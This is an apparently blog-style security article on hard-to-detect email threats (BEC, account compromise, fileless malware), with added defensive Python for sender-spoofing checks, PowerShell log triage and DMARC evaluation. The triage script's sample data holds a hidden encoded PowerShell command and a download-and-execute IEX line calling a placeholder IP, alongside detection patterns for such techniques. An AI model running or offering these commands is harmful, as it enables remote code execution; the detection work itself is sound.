The Three Hardest Email Threats for Users to Detect

Over 90% of cyberattacks begin with an email. Given how heavily individuals and businesses rely on email, that percentage is alarming. These attacks have cost organizations an average of $13 million in damages, a figure that continues to grow.

Businesses and users need to know how these attacks occur and better equip themselves to prevent future attacks. One employee could cost a company thousands with one wrong click. 

Phishing attacks and ransomware links embedded in company emails can wreak havoc on, or even destroy, a business. The result is legal fees, recovery costs, damaged reputations, and lost productivity, with 60% of smaller companies closing within six months of an attack. There are numerous ways to combat these attacks, but as defenses advance, so do the threats. This article discusses three of the most challenging email threats to detect and offers tips for identifying and avoiding them.

What Email Threats Are the Most Difficult to Detect?

Business Email Compromise (BEC)

Business email compromise, or BEC for short, is an attack that appears to come from inside a company. Similar to phishing, BEC attacks attempt to bait an employee by impersonating someone of importance within the business, for example an email that seems to come from an executive asking for access to, or information about, a system. Because businesses run at a fast pace, these attacks take time to detect: an employee working through hundreds of emails a day on top of their regular work may not notice the minor inconsistencies in a fraudulent message.

Email Account Compromise (EAC)

Email account compromise, or EAC for short, is an attack designed primarily to take over an individual's inbox. This can be done via malware, phishing, or brute-force attacks. The attacker then uses the account to send further phishing emails to the contacts of the stolen inbox, gathering more and more personal information. This attack is extremely difficult to detect because the messages are technically sent from a legitimate account, just not by its rightful owner.

Fileless Malware 

Fileless malware attacks are email attacks that run from a device's random access memory, or RAM. They do not rely on a malicious file the way ransomware or common malware does, yet they can still install and run fraudulent code on a system. They can be delivered via a phishing email and pose a threat to personal and private information. Fileless malware attacks are difficult to detect because they leave no trace on disk: there is no file to fingerprint, so signature-based antivirus software cannot detect the malicious content.

What are the Signs That My Email Account Has Been Hacked?

It's important to note that detection methods and tools vary, and consulting cybersecurity professionals or using specialized security software is recommended for identifying and mitigating fileless malware attacks against your email account. If you suspect your email account has been compromised, immediately change your password, enable two-factor authentication (if available), and contact your email service provider for further assistance.

Stay vigilant and skeptical when encountering suspicious emails or emails involving financial transactions. If you suspect a business email compromise, report it to your organization's IT department or reporting authority. Detecting these email threats is difficult, as mentioned above, but there are still methods you can use to spot them. Here are several signs to watch for to keep your accounts and your company safe:

Unexpected password changes or requests 

If you receive notifications or have trouble accessing your email account due to unexpected password changes, it could indicate your account has been compromised. If you receive unexpected password recovery or account verification requests for your email account, even though you did not initiate them, it might indicate account compromise attempts.

Unusual account or network activity 

Monitor your sent items, inbox, and trash folders for unusual or unauthorized emails. If you notice unfamiliar emails or emails sent without your knowledge, it may suggest that your account has been accessed by someone else. If you see repeated failed login attempts or unfamiliar IP addresses, it could indicate unauthorized access. 

Fileless malware often relies on network communication to carry out its malicious activities. Monitor your network traffic and look for sudden data transfer spikes or connections to suspicious IP addresses. Pay attention to any system alerts or notifications from your antivirus software that indicate suspicious activity related to your email account.

Changes in account settings 

Keep an eye on any modifications to your email account settings, such as changes in your signature, filters, or auto-responder settings. Unauthorized changes could be a sign of compromise.

Suspicious email forwarding 

Check your email settings to see if any unknown email addresses have been added for email forwarding. Cybercriminals often set up email forwarding to monitor and divert your incoming messages.

Unexpected emails or messages from contacts 

If your contacts report receiving unusual emails or messages from your account that you did not send, it could indicate that your account has been compromised and is being used to send spam or phishing messages.

Increased spam or phishing emails

Notice an influx of spam or phishing emails in your inbox? It could be a sign that your email account has been compromised and the attackers are using it to send malicious messages to your contacts.

Unusual email addresses 

BEC/EAC scammers often use email addresses that resemble legitimate addresses but have slight variations. Be cautious of emails from addresses that use a different domain or have misspellings or minor changes to the email address.

BEC scammers may also use personal email accounts instead of official company email addresses. Exercise caution when receiving business-related emails from personal accounts and verify authenticity before responding.
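The checks described in the two paragraphs above (look-alike domains, misspellings, and executives writing from personal webmail) can be automated at the mail gateway or in a mailbox rule. The following is an added example, not code from the original article; the trusted domain `example-corp.com`, the executive list, and the homoglyph table are constructed assumptions that an organisation would replace with its own data.

```python
from email.utils import parseaddr

# Constructed reference data: the company's real domain(s), the executives whose
# names are most often impersonated, and the webmail providers to treat with care.
TRUSTED_DOMAINS = {"example-corp.com"}
EXECUTIVES = {"jane doe": "jane.doe@example-corp.com"}
FREEMAIL_DOMAINS = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com"}

# Character sequences that are visually confusable with each other; the pairs are
# applied in order so that "rn" collapses to "m" before single characters are checked.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(domain):
    """Collapse common look-alike substitutions so confusable domains compare equal."""
    d = domain.lower()
    for confusable, plain in HOMOGLYPHS:
        d = d.replace(confusable, plain)
    return d


def levenshtein(a, b):
    """Edit distance between two strings (single-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_sender(from_header):
    """Return a list of human-readable findings for one From: header; empty means clean."""
    name, addr = parseaddr(from_header)
    name, addr = name.strip().lower(), addr.lower()
    domain = addr.rpartition("@")[2]
    findings = []

    if domain not in TRUSTED_DOMAINS:
        for trusted in TRUSTED_DOMAINS:
            if normalize(domain) == normalize(trusted):
                findings.append(f"homoglyph look-alike of {trusted}")
            elif levenshtein(domain, trusted) <= 2:
                findings.append(f"near-miss spelling of {trusted}")
            elif trusted in domain:
                # e.g. example-corp.com.account-verify.net: the real name is only a label
                findings.append(f"trusted name {trusted} embedded in foreign domain {domain}")
        if domain in FREEMAIL_DOMAINS:
            findings.append("personal webmail account used for business mail")

    # A familiar display name on an unfamiliar address is the classic BEC pattern.
    real_address = EXECUTIVES.get(name)
    if real_address and addr != real_address:
        findings.append(f"display name '{name}' belongs to {real_address}, not {addr}")
    return findings


if __name__ == "__main__":
    for header in ["Jane Doe <jane.doe@example-corp.com>",
                   "Jane Doe <jane.doe@exarnple-corp.com>",
                   "Jane Doe <janedoe1987@gmail.com>",
                   "IT Support <helpdesk@example-corp.com.account-verify.net>"]:
        print(header, "->", analyze_sender(header) or "no findings")
```

A gateway would typically tag or quarantine a message on any finding rather than block it outright, since a genuine partner domain can sit within edit distance 2 of your own; the value of the check is that it surfaces the inconsistency a busy employee would otherwise skim past.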

Unexpected requests for money transfers or sensitive information 

If you receive an email requesting money transfers, wire transfers, or sensitive information, especially from a high-level executive, verify the request through an alternate means of communication, such as a phone call. Scammers often impersonate company executives to trick employees into taking action.

Urgency and secrecy in communication

BEC scammers often create a sense of urgency, instructing employees to act quickly and keep the request confidential. Be cautious of emails that demand immediate action without proper verification or authentication.

Increased memory usage 

Fileless malware injects malicious code directly into the computer's memory. If you notice a significant increase in memory usage without any obvious explanation, it could be a sign of fileless malware.

Unusual behavior of legitimate processes

Fileless malware typically leverages legitimate processes or applications to execute malicious activities without leaving a trace on the file system. If you observe unusual behavior or performance issues with commonly used applications, it could be an indication of fileless malware. 

Fileless malware often utilizes legitimate scripting tools like PowerShell to execute commands and evade detection. Monitor the usage of scripting tools and investigate any suspicious or unauthorized activities.
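Monitoring scripting tools, as the paragraph above recommends, usually means enabling PowerShell script block logging and reviewing the resulting events. The following is an added example, not code from the original article: a small triage pass over constructed, simplified event records (the `id`, `user`, `parent`, and `script` fields, the sample scripts, and the 198.51.100.7 documentation-range address are all made up) that flags the features defenders commonly alert on, including a scripting host launched by an email or Office application.

```python
import re

# Constructed sample events, simplified from the shape of PowerShell script block
# logs: who ran it, which process launched PowerShell, and the script text.
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\alice", "parent": "explorer.exe",
     "script": "Get-ChildItem C:\\Reports | Where-Object Length -gt 1MB"},
    {"id": 2, "user": "CORP\\bob", "parent": "OUTLOOK.EXE",
     "script": "powershell -NoP -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAoAE4..."},
    {"id": 3, "user": "CORP\\carol", "parent": "WINWORD.EXE",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')"},
    {"id": 4, "user": "CORP\\svc-backup", "parent": "services.exe",
     "script": "Start-Service -Name BackupAgent"},
]

# Each rule is a label plus a case-insensitive pattern over the script text.
RULES = [
    ("encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{12,}", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I)),
    ("download-and-execute", re.compile(
        r"downloadstring|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)),
]

# Mail and document applications have no business launching a scripting host.
OFFICE_PARENTS = {"OUTLOOK.EXE", "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}


def triage(event):
    """Return the list of rule labels that fire for one event (empty means benign)."""
    hits = [label for label, pattern in RULES if pattern.search(event["script"])]
    if event["parent"].upper() in OFFICE_PARENTS:
        hits.append(f"spawned by Office process {event['parent']}")
    return hits


def suspicious_events(events):
    """Return (event id, hits) pairs for events with at least one hit, worst first."""
    flagged = [(e["id"], triage(e)) for e in events]
    flagged = [(eid, hits) for eid, hits in flagged if hits]
    return sorted(flagged, key=lambda pair: len(pair[1]), reverse=True)


if __name__ == "__main__":
    for eid, hits in suspicious_events(SAMPLE_EVENTS):
        event = next(e for e in SAMPLE_EVENTS if e["id"] == eid)
        print(f"event {eid} user={event['user']} parent={event['parent']}: {', '.join(hits)}")
```

The rules are deliberately coarse: a single hit such as a hidden window is worth a look, while several hits together with an Office parent process is the pattern that warrants isolating the host. In production, the same logic would run over the real event stream (event ID 4104 script block text plus process-creation events for the parent) rather than the constructed list here.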

Tips & Best Practices for Blocking Email Threats Before They Happen

There is a positive to all of these negatives. Numerous tactics can be deployed to reduce the risk of becoming a victim of these attacks. All of them share one attribute: they arrive by email, so email security should be taken seriously. Outsourcing email protection to a third party creates a mediator, making it harder and slower for malicious hackers to target a business. A cloud-based email security solution adds a critical layer of protection for sensitive information. Upper-level management will also benefit from training employees on the common types of attacks they should be on the lookout for. This keeps both the employees and the company as a whole safer.

Here are some tips and best practices for detecting and blocking email threats:

  • Implement multi-layered security: Use a combination of technologies like spam filters, antivirus software, and email encryption to enhance your email security.
  • Educate employees: Conduct regular security awareness training sessions to educate employees about email threats and standard phishing techniques. Teach them how to spot suspicious emails and what actions to take if they encounter a potential threat.
  • Use robust email filtering: Enable spam filters and configure them to block emails from suspicious senders or with known malicious content. Update the filtering rules regularly to keep pace with emerging threats.
  • Implement email authentication: Use technologies like Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting and Conformance (DMARC) to prevent email spoofing and ensure incoming emails are from valid sources.
  • Monitor email traffic: Regularly monitor email traffic for any suspicious activity or anomalies indicating a potential threat. This can be done using a combination of automated tools and manual review.
  • Enable URL and attachment scanning: Use email security solutions that automatically scan URLs and attachments in incoming emails for potential threats like malware or phishing links. Block or quarantine any suspicious content.
  • Encourage reporting of suspicious emails: Create a culture where employees are encouraged to report any suspicious or phishing emails they receive. This allows your IT team to investigate and take appropriate actions.
  • Implement email encryption: Protect sensitive information by implementing email encryption. This ensures that even if an email is intercepted, unauthorized individuals cannot read the contents.
  • Regularly update software and systems: Keep your email servers, email clients, and related software updated with the latest patches and security updates. This helps in guarding against known vulnerabilities.
  • Have a robust incident response plan: Develop an incident response plan that outlines the steps to be taken in the event of a successful email threat. This plan should include isolation, containment, investigation, and recovery steps.
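The email authentication item in the list above is the one most often deployed half-way: a domain publishes SPF and DKIM but leaves its DMARC policy at `p=none`, which reports spoofing without blocking it. The following is an added example, not code from the original article, that parses a DMARC TXT record and works out the disposition a receiver would apply to one message from its SPF and DKIM results. The two records, the domain `example-corp.com`, and the reporting address are constructed; the organisational-domain helper uses a "last two labels" approximation rather than the Public Suffix List, and the `pct` and `fo` tags are ignored.

```python
# Constructed DMARC records for the same domain: a monitoring-only record and an
# enforcing one. Only the second causes receivers to act on spoofed mail.
MONITOR_ONLY = "v=DMARC1; p=none; rua=mailto:dmarc-reports@example-corp.com"
ENFORCING = ("v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; "
             "rua=mailto:dmarc-reports@example-corp.com")

POLICIES = {"none", "quarantine", "reject"}


def parse_dmarc(record_txt):
    """Parse 'tag=value; tag=value' into a dict, applying the DMARC defaults."""
    tags = {}
    for part in record_txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    if tags.get("p") not in POLICIES:
        raise ValueError("missing or invalid p= tag")
    tags.setdefault("adkim", "r")        # relaxed DKIM alignment by default
    tags.setdefault("aspf", "r")         # relaxed SPF alignment by default
    tags.setdefault("sp", tags["p"])     # subdomain policy falls back to p=
    if tags["sp"] not in POLICIES:
        raise ValueError("invalid sp= tag")
    return tags


def org_domain(domain):
    """Approximate organisational domain: the last two labels (assumption, not the PSL)."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(auth_domain, from_domain, mode):
    """DMARC identifier alignment: strict needs an exact match, relaxed the same org domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def evaluate_dmarc(record_txt, from_domain, spf=("fail", ""), dkim=("fail", "")):
    """Return 'pass' when an aligned SPF or DKIM pass exists, otherwise the policy to apply.

    spf and dkim are (result, domain) pairs: the SPF result with its MAIL FROM domain,
    and the DKIM result with the signature's d= domain. The record is assumed to be
    the one published for from_domain's organisational domain.
    """
    tags = parse_dmarc(record_txt)
    spf_result, spf_domain = spf
    dkim_result, dkim_domain = dkim
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, tags["aspf"])
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    # Mail from a subdomain of the policy domain is governed by sp= rather than p=.
    return tags["sp"] if from_domain.lower() != org_domain(from_domain) else tags["p"]


if __name__ == "__main__":
    spoofed = dict(spf=("pass", "attacker.example"), dkim=("pass", "attacker.example"))
    print("monitor-only record, spoofed From:", evaluate_dmarc(MONITOR_ONLY, "example-corp.com", **spoofed))
    print("enforcing record, spoofed From:   ", evaluate_dmarc(ENFORCING, "example-corp.com", **spoofed))
    print("enforcing record, legitimate relay:", evaluate_dmarc(ENFORCING, "example-corp.com",
                                                                 spf=("pass", "mail.example-corp.com")))
```

The spoofed message in the usage block authenticates perfectly for the attacker's own domain, yet under the monitoring-only record the disposition is `none`, so it is delivered; the same message is rejected under the enforcing record because neither identifier aligns with the visible From: domain. That alignment check, not SPF or DKIM on their own, is what stops the display-name-plus-foreign-domain pattern used in BEC.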

Remember, no security measure is foolproof, so it's important to have a defense-in-depth approach and regularly update your security practices to stay one step ahead of evolving email threats.

Keep Learning About Email Threat Protection

There are many different types of attacks in the modern world of cybersecurity. BEC attacks make their move by appearing to come from inside the company. EAC attacks aim to take control of a user's inbox and weaponize it. Fileless attacks live in RAM and leave no trace on disk. These stealthy attacks loom in emails, but with proper protection and training they can be stopped before they cause serious harm. Now more than ever, businesses need a strong email security strategy.
